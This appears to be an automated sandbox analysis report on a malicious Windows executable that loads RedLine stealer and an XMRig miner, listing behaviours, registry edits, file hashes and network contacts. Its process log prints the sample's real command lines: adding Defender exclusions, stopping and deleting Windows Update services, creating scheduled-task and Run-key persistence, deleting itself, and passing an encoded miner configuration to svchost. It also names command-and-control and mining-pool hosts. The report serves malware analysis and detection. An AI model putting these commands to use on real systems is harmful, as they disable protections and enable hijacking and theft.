Analysis Overview
SHA256
76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d
Threat Level: Known bad
The file 76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe was found to be: Known bad.
Malicious Activity Summary
Detect PureCrypter loader
Modifies security service
Suspicious use of NtCreateUserProcessOtherParentProcess
PureCrypter
xmrig
RedLine
XMRig Miner payload
Stops running service(s)
Executes dropped EXE
UPX packed file
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Gathers network information
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-12 12:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-12 12:16
Reported
2023-01-12 12:18
Platform
win7-20220812-en
Max time kernel
150s
Max time network
118s
Command Line
Signatures
Detect PureCrypter loader
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
PureCrypter
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| N/A | N/A | C:\Program Files\Windows\WindowsHost | N/A |
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHost = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\GooglePrograms\\WindowsHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| N/A | N/A | C:\Program Files\Windows\WindowsHost | N/A |
| N/A | N/A | C:\Program Files\Windows\WindowsHost | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1004 set thread context of 1504 | N/A | C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 268 set thread context of 336 | N/A | C:\Program Files\Windows\WindowsHost | C:\Windows\System32\conhost.exe |
| PID 268 set thread context of 1532 | N/A | C:\Program Files\Windows\WindowsHost | C:\Windows\System32\svchost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Windows\WindowsHost | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Windows\WindowsHost | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 300856248826d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe
"C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig/release
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
"C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig/renew
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsHost /tr "'C:\Program Files\Windows\WindowsHost'"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qzignfste#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsHost" } Else { "C:\Program Files\Windows\WindowsHost" }
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsHost
C:\Windows\system32\taskeng.exe
taskeng.exe {F7D403EA-BBE4-4F4C-98BB-0998AFDADAD4} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Windows\WindowsHost
"C:\Program Files\Windows\WindowsHost"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsHost /tr "'C:\Program Files\Windows\WindowsHost'"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe yadsrbyzjoct
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe hfskhxmdoncbxhsb 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
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | panel382523.site | udp |
| N/A | 31.31.198.106:80 | panel382523.site | tcp |
| N/A | 65.21.237.20:43077 | tcp | |
| N/A | 8.8.8.8:53 | pool.hashvault.pro | udp |
| N/A | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| N/A | 8.8.8.8:53 | panel285626.site | udp |
| N/A | 31.31.198.99:80 | panel285626.site | tcp |
| N/A | 31.31.198.99:80 | panel285626.site | tcp |
Files
memory/1004-54-0x0000000000C80000-0x0000000000C88000-memory.dmp
memory/1004-55-0x0000000075211000-0x0000000075213000-memory.dmp
memory/1004-56-0x00000000102D0000-0x0000000010C78000-memory.dmp
memory/1004-57-0x0000000007C50000-0x0000000007CE2000-memory.dmp
memory/628-58-0x0000000000000000-mapping.dmp
memory/1648-59-0x0000000000000000-mapping.dmp
memory/1652-61-0x0000000000000000-mapping.dmp
memory/1652-63-0x000000006E760000-0x000000006ED0B000-memory.dmp
memory/1652-64-0x000000006E760000-0x000000006ED0B000-memory.dmp
\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/1496-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/1032-69-0x0000000000000000-mapping.dmp
memory/972-70-0x0000000000000000-mapping.dmp
memory/1496-72-0x000000013FE30000-0x0000000140EB1000-memory.dmp
memory/1504-74-0x0000000000400000-0x0000000000436000-memory.dmp
memory/1504-75-0x0000000000400000-0x0000000000436000-memory.dmp
memory/1504-77-0x0000000000400000-0x0000000000436000-memory.dmp
memory/1504-79-0x0000000000400000-0x0000000000436000-memory.dmp
memory/1504-80-0x0000000000400000-0x0000000000436000-memory.dmp
memory/1504-81-0x0000000000416C9E-mapping.dmp
memory/1496-84-0x000000013FE30000-0x0000000140EB1000-memory.dmp
memory/1504-83-0x0000000000400000-0x0000000000436000-memory.dmp
memory/1504-86-0x0000000000400000-0x0000000000436000-memory.dmp
memory/528-87-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp
memory/528-88-0x000007FEF41E0000-0x000007FEF4C03000-memory.dmp
memory/528-90-0x000007FEF3680000-0x000007FEF41DD000-memory.dmp
memory/528-91-0x00000000022C0000-0x0000000002340000-memory.dmp
memory/528-92-0x00000000022C0000-0x0000000002340000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 850a651341c50bd7fcde230cabc9a1da |
| SHA1 | d7af1595fec68609419101413d46ccf957670c30 |
| SHA256 | 2ad14e8c9a41df6c25c04979f41cbd231b3c9974a99627ec062e06d4d8262385 |
| SHA512 | 7ac4ad1937f38b28fdb7e2417d63e7d7aef13daebec2e9ce33b30a86b8925bae70aedda0d128bff2deabc5b6603eaa00a424fb71733e9becfb874d3c721abfb3 |
memory/1612-94-0x0000000000000000-mapping.dmp
memory/1384-97-0x0000000000000000-mapping.dmp
memory/1820-96-0x000007FEF3840000-0x000007FEF4263000-memory.dmp
memory/956-98-0x0000000000000000-mapping.dmp
memory/952-100-0x0000000000000000-mapping.dmp
memory/1820-99-0x000007FEF2CE0000-0x000007FEF383D000-memory.dmp
memory/592-101-0x0000000000000000-mapping.dmp
memory/2028-102-0x0000000000000000-mapping.dmp
memory/268-103-0x0000000000000000-mapping.dmp
memory/672-104-0x0000000000000000-mapping.dmp
memory/1828-106-0x0000000000000000-mapping.dmp
memory/1556-105-0x0000000000000000-mapping.dmp
memory/2008-108-0x0000000000000000-mapping.dmp
memory/1820-107-0x0000000001F14000-0x0000000001F17000-memory.dmp
memory/1820-109-0x0000000001F1B000-0x0000000001F3A000-memory.dmp
memory/1156-110-0x0000000000000000-mapping.dmp
memory/1944-111-0x0000000000000000-mapping.dmp
memory/1820-112-0x0000000001F1B000-0x0000000001F3A000-memory.dmp
memory/1356-113-0x0000000000000000-mapping.dmp
memory/1532-114-0x0000000000000000-mapping.dmp
memory/1496-116-0x000000013FE30000-0x0000000140EB1000-memory.dmp
memory/796-117-0x0000000000000000-mapping.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 850a651341c50bd7fcde230cabc9a1da |
| SHA1 | d7af1595fec68609419101413d46ccf957670c30 |
| SHA256 | 2ad14e8c9a41df6c25c04979f41cbd231b3c9974a99627ec062e06d4d8262385 |
| SHA512 | 7ac4ad1937f38b28fdb7e2417d63e7d7aef13daebec2e9ce33b30a86b8925bae70aedda0d128bff2deabc5b6603eaa00a424fb71733e9becfb874d3c721abfb3 |
memory/848-120-0x000007FEF41E0000-0x000007FEF4C03000-memory.dmp
memory/848-121-0x000007FEF3680000-0x000007FEF41DD000-memory.dmp
memory/848-122-0x0000000002774000-0x0000000002777000-memory.dmp
memory/848-123-0x000000000277B000-0x000000000279A000-memory.dmp
memory/1616-124-0x0000000000000000-mapping.dmp
memory/848-125-0x0000000002774000-0x0000000002777000-memory.dmp
memory/848-126-0x000000000277B000-0x000000000279A000-memory.dmp
\Program Files\Windows\WindowsHost
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/268-128-0x0000000000000000-mapping.dmp
C:\Program Files\Windows\WindowsHost
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
